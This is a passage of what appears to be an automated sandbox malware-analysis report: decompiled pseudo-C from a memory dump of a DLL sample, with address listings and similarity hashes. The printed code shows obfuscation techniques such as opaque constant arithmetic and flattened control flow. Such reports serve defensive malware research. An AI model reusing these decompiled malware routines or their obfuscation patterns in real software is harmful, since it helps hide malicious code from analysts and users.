                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t444 != _t368) {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t389 =  *0x2f76220; // 0x0
                                                                                                                                                                            						_t403 = _v20;
                                                                                                                                                                            						_t390 = E02F68B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
                                                                                                                                                                            						_t448 =  &(_t448[5]);
                                                                                                                                                                            						if(_t390 != _v120) {
                                                                                                                                                                            							_t444 = 0x7737a40;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t444 = 0x9042860;
                                                                                                                                                                            							_t391 = 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            						L12:
                                                                                                                                                                            						__eflags = _t444 - 0xe3acfc2;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					goto L16;
                                                                                                                                                                            				}
                                                                                                                                                                            			}



































































                                                                                                                                                                            0x02f62142
                                                                                                                                                                            0x02f62148
                                                                                                                                                                            0x02f62155
                                                                                                                                                                            0x02f62160
                                                                                                                                                                            0x02f6216f
                                                                                                                                                                            0x02f62171
                                                                                                                                                                            0x02f62176
                                                                                                                                                                            0x02f6217d
                                                                                                                                                                            0x02f62185
                                                                                                                                                                            0x02f62193
                                                                                                                                                                            0x02f62196
                                                                                                                                                                            0x02f62198
                                                                                                                                                                            0x02f6219e
                                                                                                                                                                            0x02f621a6
                                                                                                                                                                            0x02f621ae
                                                                                                                                                                            0x02f621bb
                                                                                                                                                                            0x02f621be
                                                                                                                                                                            0x02f621c2
                                                                                                                                                                            0x02f621ca
                                                                                                                                                                            0x02f621d2
                                                                                                                                                                            0x02f621df
                                                                                                                                                                            0x02f621e3
                                                                                                                                                                            0x02f621e8
                                                                                                                                                                            0x02f621ed
                                                                                                                                                                            0x02f621f5
                                                                                                                                                                            0x02f62202
                                                                                                                                                                            0x02f62206
                                                                                                                                                                            0x02f6220e
                                                                                                                                                                            0x02f62213
                                                                                                                                                                            0x02f6221b
                                                                                                                                                                            0x02f62223
                                                                                                                                                                            0x02f62233
                                                                                                                                                                            0x02f62237
                                                                                                                                                                            0x02f6223f
                                                                                                                                                                            0x02f62247
                                                                                                                                                                            0x02f6224f
                                                                                                                                                                            0x02f62257
                                                                                                                                                                            0x02f6225c
                                                                                                                                                                            0x02f62264
                                                                                                                                                                            0x02f6226f
                                                                                                                                                                            0x02f6227a
                                                                                                                                                                            0x02f62285
                                                                                                                                                                            0x02f6228d
                                                                                                                                                                            0x02f62292
                                                                                                                                                                            0x02f6229a
                                                                                                                                                                            0x02f622a5
                                                                                                                                                                            0x02f622b0
                                                                                                                                                                            0x02f622bb
                                                                                                                                                                            0x02f622c7
                                                                                                                                                                            0x02f622cc
                                                                                                                                                                            0x02f622d2
                                                                                                                                                                            0x02f622d7
                                                                                                                                                                            0x02f622df
                                                                                                                                                                            0x02f622ea
                                                                                                                                                                            0x02f622f2
                                                                                                                                                                            0x02f622fd
                                                                                                                                                                            0x02f62305
                                                                                                                                                                            0x02f62311
                                                                                                                                                                            0x02f62314
                                                                                                                                                                            0x02f62318
                                                                                                                                                                            0x02f62320
                                                                                                                                                                            0x02f6232a
                                                                                                                                                                            0x02f62338
                                                                                                                                                                            0x02f6233d
                                                                                                                                                                            0x02f62343
                                                                                                                                                                            0x02f6234b
                                                                                                                                                                            0x02f62353
                                                                                                                                                                            0x02f6235d
                                                                                                                                                                            0x02f62360
                                                                                                                                                                            0x02f62364
                                                                                                                                                                            0x02f6236c
                                                                                                                                                                            0x02f62374
                                                                                                                                                                            0x02f6237c
                                                                                                                                                                            0x02f62384
                                                                                                                                                                            0x02f6238c
                                                                                                                                                                            0x02f62397
                                                                                                                                                                            0x02f6239f
                                                                                                                                                                            0x02f623aa
                                                                                                                                                                            0x02f623b5
                                                                                                                                                                            0x02f623c0
                                                                                                                                                                            0x02f623cb
                                                                                                                                                                            0x02f623d3
                                                                                                                                                                            0x02f623db
                                                                                                                                                                            0x02f623e0
                                                                                                                                                                            0x02f623e8
                                                                                                                                                                            0x02f623f0
                                                                                                                                                                            0x02f623f8
                                                                                                                                                                            0x02f62400
                                                                                                                                                                            0x02f62408
                                                                                                                                                                            0x02f62410
                                                                                                                                                                            0x02f62414
                                                                                                                                                                            0x02f6241c
                                                                                                                                                                            0x02f62429
                                                                                                                                                                            0x02f6242d
                                                                                                                                                                            0x02f6243a
                                                                                                                                                                            0x02f6243e
                                                                                                                                                                            0x02f62446
                                                                                                                                                                            0x02f6244e
                                                                                                                                                                            0x02f6245a
                                                                                                                                                                            0x02f6245d
                                                                                                                                                                            0x02f62461
                                                                                                                                                                            0x02f62469
                                                                                                                                                                            0x02f62471
                                                                                                                                                                            0x02f62479
                                                                                                                                                                            0x02f62481
                                                                                                                                                                            0x02f62489
                                                                                                                                                                            0x02f62499
                                                                                                                                                                            0x02f624a1
                                                                                                                                                                            0x02f624a9
                                                                                                                                                                            0x02f624b1
                                                                                                                                                                            0x02f624b6
                                                                                                                                                                            0x02f624be
                                                                                                                                                                            0x02f624c3
                                                                                                                                                                            0x02f624cb
                                                                                                                                                                            0x02f624d8
                                                                                                                                                                            0x02f624dc
                                                                                                                                                                            0x02f624e4
                                                                                                                                                                            0x02f624ec
                                                                                                                                                                            0x02f624f6
                                                                                                                                                                            0x02f624fa
                                                                                                                                                                            0x02f62502
                                                                                                                                                                            0x02f6250a
                                                                                                                                                                            0x02f6251f
                                                                                                                                                                            0x02f62524
                                                                                                                                                                            0x02f6252a
                                                                                                                                                                            0x02f6252f
                                                                                                                                                                            0x02f62537
                                                                                                                                                                            0x02f62543
                                                                                                                                                                            0x02f62548
                                                                                                                                                                            0x02f6254e
                                                                                                                                                                            0x02f62556
                                                                                                                                                                            0x02f6255e
                                                                                                                                                                            0x02f62563
                                                                                                                                                                            0x02f62568
                                                                                                                                                                            0x02f62570
                                                                                                                                                                            0x02f62578
                                                                                                                                                                            0x02f62580
                                                                                                                                                                            0x02f62589
                                                                                                                                                                            0x02f6258e
                                                                                                                                                                            0x02f62594
                                                                                                                                                                            0x02f6259c
                                                                                                                                                                            0x02f625a4
                                                                                                                                                                            0x02f625b1
                                                                                                                                                                            0x02f625b2
                                                                                                                                                                            0x02f625bc
                                                                                                                                                                            0x02f625c0
                                                                                                                                                                            0x02f625c8
                                                                                                                                                                            0x02f625d3
                                                                                                                                                                            0x02f625de
                                                                                                                                                                            0x02f625e9
                                                                                                                                                                            0x02f625f4
                                                                                                                                                                            0x02f625fc
                                                                                                                                                                            0x02f62607
                                                                                                                                                                            0x02f62612
                                                                                                                                                                            0x02f6261d
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f6262d
                                                                                                                                                                            0x02f6262d
                                                                                                                                                                            0x02f62633
                                                                                                                                                                            0x02f62710
                                                                                                                                                                            0x02f62719
                                                                                                                                                                            0x02f62720
                                                                                                                                                                            0x02f62731
                                                                                                                                                                            0x02f6275d
                                                                                                                                                                            0x02f6276b
                                                                                                                                                                            0x02f6276d
                                                                                                                                                                            0x02f62778
                                                                                                                                                                            0x02f6277d
                                                                                                                                                                            0x02f62780
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62780
                                                                                                                                                                            0x02f6263f
                                                                                                                                                                            0x02f626b4
                                                                                                                                                                            0x02f626b5
                                                                                                                                                                            0x02f626b8
                                                                                                                                                                            0x02f626bd
                                                                                                                                                                            0x02f626c5
                                                                                                                                                                            0x02f626df
                                                                                                                                                                            0x02f626e7
                                                                                                                                                                            0x02f626ec
                                                                                                                                                                            0x02f626f2
                                                                                                                                                                            0x02f626f5
                                                                                                                                                                            0x02f626fd
                                                                                                                                                                            0x02f626ff
                                                                                                                                                                            0x02f62702
                                                                                                                                                                            0x02f62705
                                                                                                                                                                            0x02f62708
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62628
                                                                                                                                                                            0x02f62643
                                                                                                                                                                            0x02f627b7
                                                                                                                                                                            0x02f627c4
                                                                                                                                                                            0x02f627d7
                                                                                                                                                                            0x02f627e4
                                                                                                                                                                            0x02f627ef
                                                                                                                                                                            0x02f627f8
                                                                                                                                                                            0x02f627f8
                                                                                                                                                                            0x02f6264f
                                                                                                                                                                            0x02f627a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f627ac
                                                                                                                                                                            0x02f62657
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62661
                                                                                                                                                                            0x02f6267b
                                                                                                                                                                            0x02f62682
                                                                                                                                                                            0x02f62687
                                                                                                                                                                            0x02f6268e
                                                                                                                                                                            0x02f6269a
                                                                                                                                                                            0x02f62690
                                                                                                                                                                            0x02f62692
                                                                                                                                                                            0x02f62697
                                                                                                                                                                            0x02f62697
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62785
                                                                                                                                                                            0x02f62785
                                                                                                                                                                            0x02f62785
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62791

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )^^$:*$J;$b$f
                                                                                                                                                                            • API String ID: 0-204930537
                                                                                                                                                                            • Opcode ID: 79f39e9e19a45b2513087a3307a8df3adda47f8729f0df5bd54a8b27ffbdf39a
                                                                                                                                                                            • Instruction ID: 0136617c20cf1c5123abec95d07cea5d15f827654c09bbc6450e107e7a7cd4e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 79f39e9e19a45b2513087a3307a8df3adda47f8729f0df5bd54a8b27ffbdf39a
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF121B16083809FC368CF25D58AA0BFBF2FBC4758F50891DF69986260D7B58949CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F72009() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				signed int _v1044;
                                                                                                                                                                            				intOrPtr _v1048;
                                                                                                                                                                            				intOrPtr _v1052;
                                                                                                                                                                            				signed int _v1056;
                                                                                                                                                                            				signed int _v1060;
                                                                                                                                                                            				signed int _v1064;
                                                                                                                                                                            				signed int _v1068;
                                                                                                                                                                            				signed int _v1072;
                                                                                                                                                                            				signed int _v1076;
                                                                                                                                                                            				signed int _v1080;
                                                                                                                                                                            				signed int _v1084;
                                                                                                                                                                            				signed int _v1088;
                                                                                                                                                                            				signed int _v1092;
                                                                                                                                                                            				signed int _v1096;
                                                                                                                                                                            				signed int _v1100;
                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                            				signed int _v1108;
                                                                                                                                                                            				signed int _v1112;
                                                                                                                                                                            				signed int _v1116;
                                                                                                                                                                            				signed int _v1120;
                                                                                                                                                                            				signed int _v1124;
                                                                                                                                                                            				signed int _v1128;
                                                                                                                                                                            				signed int _v1132;
                                                                                                                                                                            				unsigned int _v1136;
                                                                                                                                                                            				signed int _v1140;
                                                                                                                                                                            				signed int _v1144;
                                                                                                                                                                            				signed int _v1148;
                                                                                                                                                                            				signed int _v1152;
                                                                                                                                                                            				signed int _v1156;
                                                                                                                                                                            				signed int _v1160;
                                                                                                                                                                            				signed int _v1164;
                                                                                                                                                                            				signed int _v1168;
                                                                                                                                                                            				signed int _v1172;
                                                                                                                                                                            				unsigned int _v1176;
                                                                                                                                                                            				signed int _v1180;
                                                                                                                                                                            				signed int _v1184;
                                                                                                                                                                            				void* _t310;
                                                                                                                                                                            				intOrPtr _t312;
                                                                                                                                                                            				void* _t315;
                                                                                                                                                                            				void* _t319;
                                                                                                                                                                            				void* _t320;
                                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                                            				signed int _t326;
                                                                                                                                                                            				signed int _t327;
                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                            				signed int _t329;
                                                                                                                                                                            				signed int _t330;
                                                                                                                                                                            				signed int _t331;
                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                                            				void* _t364;
                                                                                                                                                                            				signed int* _t368;
                                                                                                                                                                            
                                                                                                                                                                            				_t368 =  &_v1184;
                                                                                                                                                                            				_v1044 = _v1044 & 0x00000000;
                                                                                                                                                                            				_v1052 = 0x35c0cd;
                                                                                                                                                                            				_v1048 = 0xa3be33;
                                                                                                                                                                            				_v1136 = 0x5ade05;
                                                                                                                                                                            				_v1136 = _v1136 + 0xffffc499;
                                                                                                                                                                            				_v1136 = _v1136 >> 0xf;
                                                                                                                                                                            				_v1136 = _v1136 ^ 0x000b842c;
                                                                                                                                                                            				_v1180 = 0x412a9d;
                                                                                                                                                                            				_t326 = 0x29;
                                                                                                                                                                            				_v1180 = _v1180 / _t326;
                                                                                                                                                                            				_v1180 = _v1180 << 0xb;
                                                                                                                                                                            				_t364 = 0xe958b9c;
                                                                                                                                                                            				_v1180 = _v1180 + 0xffff9519;
                                                                                                                                                                            				_v1180 = _v1180 ^ 0x0cbc23a5;
                                                                                                                                                                            				_v1156 = 0xd33cfc;
                                                                                                                                                                            				_v1156 = _v1156 + 0xffff4a87;
                                                                                                                                                                            				_v1156 = _v1156 ^ 0xbe5aeb75;
                                                                                                                                                                            				_t327 = 0xb;
                                                                                                                                                                            				_v1156 = _v1156 * 0x62;
                                                                                                                                                                            				_v1156 = _v1156 ^ 0xf0302705;
                                                                                                                                                                            				_v1148 = 0xf18826;
                                                                                                                                                                            				_v1148 = _v1148 << 1;
                                                                                                                                                                            				_v1148 = _v1148 >> 0xa;
                                                                                                                                                                            				_v1148 = _v1148 + 0xffff44eb;
                                                                                                                                                                            				_v1148 = _v1148 ^ 0xfffe3e21;
                                                                                                                                                                            				_v1112 = 0x4e0c4f;
                                                                                                                                                                            				_v1112 = _v1112 + 0x7be6;
                                                                                                                                                                            				_v1112 = _v1112 ^ 0x004f5571;
                                                                                                                                                                            				_v1128 = 0xa7ca39;
                                                                                                                                                                            				_v1128 = _v1128 + 0xffffebca;
                                                                                                                                                                            				_v1128 = _v1128 / _t327;
                                                                                                                                                                            				_v1128 = _v1128 ^ 0x000be641;
                                                                                                                                                                            				_v1176 = 0xb5e613;
                                                                                                                                                                            				_v1176 = _v1176 << 0xb;
                                                                                                                                                                            				_v1176 = _v1176 << 0xb;
                                                                                                                                                                            				_v1176 = _v1176 >> 3;
                                                                                                                                                                            				_v1176 = _v1176 ^ 0x109d8d71;
                                                                                                                                                                            				_v1100 = 0x8f570;
                                                                                                                                                                            				_v1100 = _v1100 << 6;
                                                                                                                                                                            				_v1100 = _v1100 ^ 0x02300751;
                                                                                                                                                                            				_v1184 = 0x7a4582;
                                                                                                                                                                            				_v1184 = _v1184 >> 0xc;
                                                                                                                                                                            				_v1184 = _v1184 + 0xffff757f;
                                                                                                                                                                            				_v1184 = _v1184 + 0xcda4;
                                                                                                                                                                            				_v1184 = _v1184 ^ 0x0000a546;
                                                                                                                                                                            				_v1140 = 0x8d05f4;
                                                                                                                                                                            				_v1140 = _v1140 * 3;
                                                                                                                                                                            				_v1140 = _v1140 | 0x54c49d95;
                                                                                                                                                                            				_v1140 = _v1140 + 0xffffe0ec;
                                                                                                                                                                            				_v1140 = _v1140 ^ 0x55e75198;
                                                                                                                                                                            				_v1108 = 0xd76cc6;
                                                                                                                                                                            				_v1108 = _v1108 | 0x05cc2328;
                                                                                                                                                                            				_v1108 = _v1108 ^ 0x05dcca41;
                                                                                                                                                                            				_v1076 = 0x1bbfa4;
                                                                                                                                                                            				_v1076 = _v1076 * 0x15;
                                                                                                                                                                            				_v1076 = _v1076 ^ 0x02435ecc;
                                                                                                                                                                            				_v1084 = 0x2803a8;
                                                                                                                                                                            				_v1084 = _v1084 << 0xd;
                                                                                                                                                                            				_v1084 = _v1084 ^ 0x007964fc;
                                                                                                                                                                            				_v1092 = 0x1abb48;
                                                                                                                                                                            				_v1092 = _v1092 ^ 0xd0321100;
                                                                                                                                                                            				_v1092 = _v1092 ^ 0xd024152f;
                                                                                                                                                                            				_v1120 = 0x1b785b;
                                                                                                                                                                            				_v1120 = _v1120 + 0x6594;
                                                                                                                                                                            				_v1120 = _v1120 ^ 0xc9bc1812;
                                                                                                                                                                            				_v1120 = _v1120 ^ 0xc9a1a482;
                                                                                                                                                                            				_v1056 = 0xf96b0d;
                                                                                                                                                                            				_v1056 = _v1056 | 0x7a81934f;
                                                                                                                                                                            				_v1056 = _v1056 ^ 0x7af06d17;
                                                                                                                                                                            				_v1116 = 0xc0176d;
                                                                                                                                                                            				_t328 = 0x57;
                                                                                                                                                                            				_v1116 = _v1116 / _t328;
                                                                                                                                                                            				_v1116 = _v1116 ^ 0x000c7a92;
                                                                                                                                                                            				_v1144 = 0x386a20;
                                                                                                                                                                            				_v1144 = _v1144 >> 0xa;
                                                                                                                                                                            				_t329 = 0x41;
                                                                                                                                                                            				_v1144 = _v1144 * 0x35;
                                                                                                                                                                            				_v1144 = _v1144 + 0xffff2f3c;
                                                                                                                                                                            				_v1144 = _v1144 ^ 0x00015cc7;
                                                                                                                                                                            				_v1124 = 0xfe7131;
                                                                                                                                                                            				_v1124 = _v1124 >> 4;
                                                                                                                                                                            				_v1124 = _v1124 + 0xffffd592;
                                                                                                                                                                            				_v1124 = _v1124 ^ 0x000ea5e3;
                                                                                                                                                                            				_v1172 = 0xf233ef;
                                                                                                                                                                            				_v1172 = _v1172 / _t329;
                                                                                                                                                                            				_v1172 = _v1172 >> 8;
                                                                                                                                                                            				_v1172 = _v1172 >> 7;
                                                                                                                                                                            				_v1172 = _v1172 ^ 0x000dfea7;
                                                                                                                                                                            				_v1088 = 0xf13b31;
                                                                                                                                                                            				_v1088 = _v1088 << 4;
                                                                                                                                                                            				_v1088 = _v1088 ^ 0x0f1b90b2;
                                                                                                                                                                            				_v1060 = 0x8432f0;
                                                                                                                                                                            				_v1060 = _v1060 + 0xf898;
                                                                                                                                                                            				_v1060 = _v1060 ^ 0x00806ced;
                                                                                                                                                                            				_v1096 = 0x8a20ae;
                                                                                                                                                                            				_v1096 = _v1096 + 0xffff5c91;
                                                                                                                                                                            				_v1096 = _v1096 ^ 0x008c8276;
                                                                                                                                                                            				_v1072 = 0xbc3343;
                                                                                                                                                                            				_v1072 = _v1072 | 0xeb032685;
                                                                                                                                                                            				_v1072 = _v1072 ^ 0xebbb8611;
                                                                                                                                                                            				_v1104 = 0xb5445c;
                                                                                                                                                                            				_v1104 = _v1104 | 0x38284c17;
                                                                                                                                                                            				_v1104 = _v1104 ^ 0x38b8f1ba;
                                                                                                                                                                            				_v1152 = 0x20ddec;
                                                                                                                                                                            				_t330 = 0x69;
                                                                                                                                                                            				_v1152 = _v1152 * 0x4d;
                                                                                                                                                                            				_v1152 = _v1152 >> 1;
                                                                                                                                                                            				_v1152 = _v1152 << 0xc;
                                                                                                                                                                            				_v1152 = _v1152 ^ 0x15fd1151;
                                                                                                                                                                            				_v1132 = 0xda9d4d;
                                                                                                                                                                            				_v1132 = _v1132 / _t330;
                                                                                                                                                                            				_v1132 = _v1132 ^ 0x63ba58ef;
                                                                                                                                                                            				_v1132 = _v1132 ^ 0x63ba5da3;
                                                                                                                                                                            				_v1080 = 0xcf1222;
                                                                                                                                                                            				_v1080 = _v1080 | 0x484758e4;
                                                                                                                                                                            				_v1080 = _v1080 ^ 0x48c184f1;
                                                                                                                                                                            				_v1064 = 0x309461;
                                                                                                                                                                            				_v1064 = _v1064 + 0xffffd409;
                                                                                                                                                                            				_v1064 = _v1064 ^ 0x00392de5;
                                                                                                                                                                            				_v1164 = 0xd882bd;
                                                                                                                                                                            				_t331 = 0xc;
                                                                                                                                                                            				_v1164 = _v1164 / _t331;
                                                                                                                                                                            				_v1164 = _v1164 + 0x74b;
                                                                                                                                                                            				_v1164 = _v1164 >> 3;
                                                                                                                                                                            				_v1164 = _v1164 ^ 0x00039f5a;
                                                                                                                                                                            				_v1160 = 0x7a48e2;
                                                                                                                                                                            				_v1160 = _v1160 ^ 0x69cb0a8d;
                                                                                                                                                                            				_v1160 = _v1160 ^ 0x1624d419;
                                                                                                                                                                            				_v1160 = _v1160 >> 9;
                                                                                                                                                                            				_v1160 = _v1160 ^ 0x00301506;
                                                                                                                                                                            				_v1168 = 0x1f51cb;
                                                                                                                                                                            				_v1168 = _v1168 ^ 0x7c6813be;
                                                                                                                                                                            				_v1168 = _v1168 * 0x65;
                                                                                                                                                                            				_v1168 = _v1168 + 0xffff91bf;
                                                                                                                                                                            				_v1168 = _v1168 ^ 0x1b097545;
                                                                                                                                                                            				_v1068 = 0x9ab8d;
                                                                                                                                                                            				_v1068 = _v1068 + 0x88f0;
                                                                                                                                                                            				_v1068 = _v1068 ^ 0x000186e4;
                                                                                                                                                                            				E02F5556B(_t331);
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t364 != 0x62623fc) {
                                                                                                                                                                            						if(_t364 == 0x81770e6) {
                                                                                                                                                                            							return E02F6654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t364 == 0xe065299) {
                                                                                                                                                                            							_push(_v1124);
                                                                                                                                                                            							_push(_v1144);
                                                                                                                                                                            							_push(_v1116);
                                                                                                                                                                            							_t319 = E02F6E1F8(0x2f51080, _v1056, __eflags);
                                                                                                                                                                            							_t320 = E02F5DC1B(_v1172);
                                                                                                                                                                            							_t340 =  *0x2f76214; // 0x0
                                                                                                                                                                            							_t321 =  *0x2f76214; // 0x0
                                                                                                                                                                            							E02F744AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
                                                                                                                                                                            							_t315 = E02F6FECB(_t319, _v1132, _v1080, _v1064, _v1164);
                                                                                                                                                                            							_t368 =  &(_t368[0xf]);
                                                                                                                                                                            							_t364 = 0x81770e6;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t364 != 0xe958b9c) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t364 = 0x62623fc;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_v1128);
                                                                                                                                                                            					_push(_v1112);
                                                                                                                                                                            					_push(_v1148);
                                                                                                                                                                            					_t310 = E02F6E1F8(0x2f51000, _v1156, __eflags);
                                                                                                                                                                            					_t333 =  *0x2f76214; // 0x0
                                                                                                                                                                            					_t312 =  *0x2f76214; // 0x0
                                                                                                                                                                            					__eflags = _t312 + 0x23c;
                                                                                                                                                                            					E02F72D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
                                                                                                                                                                            					_t315 = E02F6FECB(_t310, _v1076, _v1084, _v1092, _v1120);
                                                                                                                                                                            					_t368 =  &(_t368[0xe]);
                                                                                                                                                                            					_t364 = 0xe065299;
                                                                                                                                                                            					L8:
                                                                                                                                                                            					__eflags = _t364 - 0xc2e12c9;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				return _t315;
                                                                                                                                                                            			}

























































                                                                                                                                                                            0x02f72009
                                                                                                                                                                            0x02f7200f
                                                                                                                                                                            0x02f72019
                                                                                                                                                                            0x02f72024
                                                                                                                                                                            0x02f7202f
                                                                                                                                                                            0x02f72037
                                                                                                                                                                            0x02f7203f
                                                                                                                                                                            0x02f72044
                                                                                                                                                                            0x02f7204c
                                                                                                                                                                            0x02f7205e
                                                                                                                                                                            0x02f72063
                                                                                                                                                                            0x02f72069
                                                                                                                                                                            0x02f7206e
                                                                                                                                                                            0x02f72073
                                                                                                                                                                            0x02f7207b
                                                                                                                                                                            0x02f72083
                                                                                                                                                                            0x02f7208b
                                                                                                                                                                            0x02f72093
                                                                                                                                                                            0x02f720a0
                                                                                                                                                                            0x02f720a1
                                                                                                                                                                            0x02f720a5
                                                                                                                                                                            0x02f720ad
                                                                                                                                                                            0x02f720b5
                                                                                                                                                                            0x02f720b9
                                                                                                                                                                            0x02f720be
                                                                                                                                                                            0x02f720c6
                                                                                                                                                                            0x02f720ce
                                                                                                                                                                            0x02f720d6
                                                                                                                                                                            0x02f720de
                                                                                                                                                                            0x02f720e6
                                                                                                                                                                            0x02f720ee
                                                                                                                                                                            0x02f720fc
                                                                                                                                                                            0x02f72100
                                                                                                                                                                            0x02f72108
                                                                                                                                                                            0x02f72110
                                                                                                                                                                            0x02f72115
                                                                                                                                                                            0x02f7211a
                                                                                                                                                                            0x02f7211f
                                                                                                                                                                            0x02f72127
                                                                                                                                                                            0x02f7212f
                                                                                                                                                                            0x02f72134
                                                                                                                                                                            0x02f7213c
                                                                                                                                                                            0x02f72144
                                                                                                                                                                            0x02f72149
                                                                                                                                                                            0x02f72151
                                                                                                                                                                            0x02f72159
                                                                                                                                                                            0x02f72161
                                                                                                                                                                            0x02f7216e
                                                                                                                                                                            0x02f72172
                                                                                                                                                                            0x02f7217a
                                                                                                                                                                            0x02f72182
                                                                                                                                                                            0x02f7218a
                                                                                                                                                                            0x02f72192
                                                                                                                                                                            0x02f7219a
                                                                                                                                                                            0x02f721a2
                                                                                                                                                                            0x02f721af
                                                                                                                                                                            0x02f721b3
                                                                                                                                                                            0x02f721bb
                                                                                                                                                                            0x02f721c3
                                                                                                                                                                            0x02f721c8
                                                                                                                                                                            0x02f721d0
                                                                                                                                                                            0x02f721d8
                                                                                                                                                                            0x02f721e0
                                                                                                                                                                            0x02f721e8
                                                                                                                                                                            0x02f721f0
                                                                                                                                                                            0x02f721f8
                                                                                                                                                                            0x02f72200
                                                                                                                                                                            0x02f72208
                                                                                                                                                                            0x02f72215
                                                                                                                                                                            0x02f72220
                                                                                                                                                                            0x02f7222b
                                                                                                                                                                            0x02f72239
                                                                                                                                                                            0x02f7223e
                                                                                                                                                                            0x02f72244
                                                                                                                                                                            0x02f7224c
                                                                                                                                                                            0x02f72254
                                                                                                                                                                            0x02f7225e
                                                                                                                                                                            0x02f72261
                                                                                                                                                                            0x02f72265
                                                                                                                                                                            0x02f7226d
                                                                                                                                                                            0x02f72275
                                                                                                                                                                            0x02f7227d
                                                                                                                                                                            0x02f72282
                                                                                                                                                                            0x02f7228a
                                                                                                                                                                            0x02f72292
                                                                                                                                                                            0x02f722a2
                                                                                                                                                                            0x02f722a6
                                                                                                                                                                            0x02f722ab
                                                                                                                                                                            0x02f722b0
                                                                                                                                                                            0x02f722b8
                                                                                                                                                                            0x02f722c0
                                                                                                                                                                            0x02f722c5
                                                                                                                                                                            0x02f722cd
                                                                                                                                                                            0x02f722d8
                                                                                                                                                                            0x02f722e3
                                                                                                                                                                            0x02f722ee
                                                                                                                                                                            0x02f722f6
                                                                                                                                                                            0x02f722fe
                                                                                                                                                                            0x02f72306
                                                                                                                                                                            0x02f72311
                                                                                                                                                                            0x02f7231c
                                                                                                                                                                            0x02f72327
                                                                                                                                                                            0x02f7232f
                                                                                                                                                                            0x02f72337
                                                                                                                                                                            0x02f7233f
                                                                                                                                                                            0x02f7234c
                                                                                                                                                                            0x02f7234f
                                                                                                                                                                            0x02f72353
                                                                                                                                                                            0x02f72357
                                                                                                                                                                            0x02f7235c
                                                                                                                                                                            0x02f72364
                                                                                                                                                                            0x02f72374
                                                                                                                                                                            0x02f72378
                                                                                                                                                                            0x02f72380
                                                                                                                                                                            0x02f72388
                                                                                                                                                                            0x02f72390
                                                                                                                                                                            0x02f72398
                                                                                                                                                                            0x02f723a0
                                                                                                                                                                            0x02f723ab
                                                                                                                                                                            0x02f723b6
                                                                                                                                                                            0x02f723c1
                                                                                                                                                                            0x02f723cd
                                                                                                                                                                            0x02f723d0
                                                                                                                                                                            0x02f723d4
                                                                                                                                                                            0x02f723dc
                                                                                                                                                                            0x02f723e1
                                                                                                                                                                            0x02f723e9
                                                                                                                                                                            0x02f723f1
                                                                                                                                                                            0x02f723f9
                                                                                                                                                                            0x02f72401
                                                                                                                                                                            0x02f72406
                                                                                                                                                                            0x02f7240e
                                                                                                                                                                            0x02f72416
                                                                                                                                                                            0x02f72423
                                                                                                                                                                            0x02f72427
                                                                                                                                                                            0x02f7242f
                                                                                                                                                                            0x02f72437
                                                                                                                                                                            0x02f72442
                                                                                                                                                                            0x02f7244d
                                                                                                                                                                            0x02f72460
                                                                                                                                                                            0x02f72474
                                                                                                                                                                            0x02f72474
                                                                                                                                                                            0x02f7247e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f725e3
                                                                                                                                                                            0x02f72486
                                                                                                                                                                            0x02f72498
                                                                                                                                                                            0x02f724a1
                                                                                                                                                                            0x02f724a5
                                                                                                                                                                            0x02f724b0
                                                                                                                                                                            0x02f724bb
                                                                                                                                                                            0x02f724c7
                                                                                                                                                                            0x02f724de
                                                                                                                                                                            0x02f72506
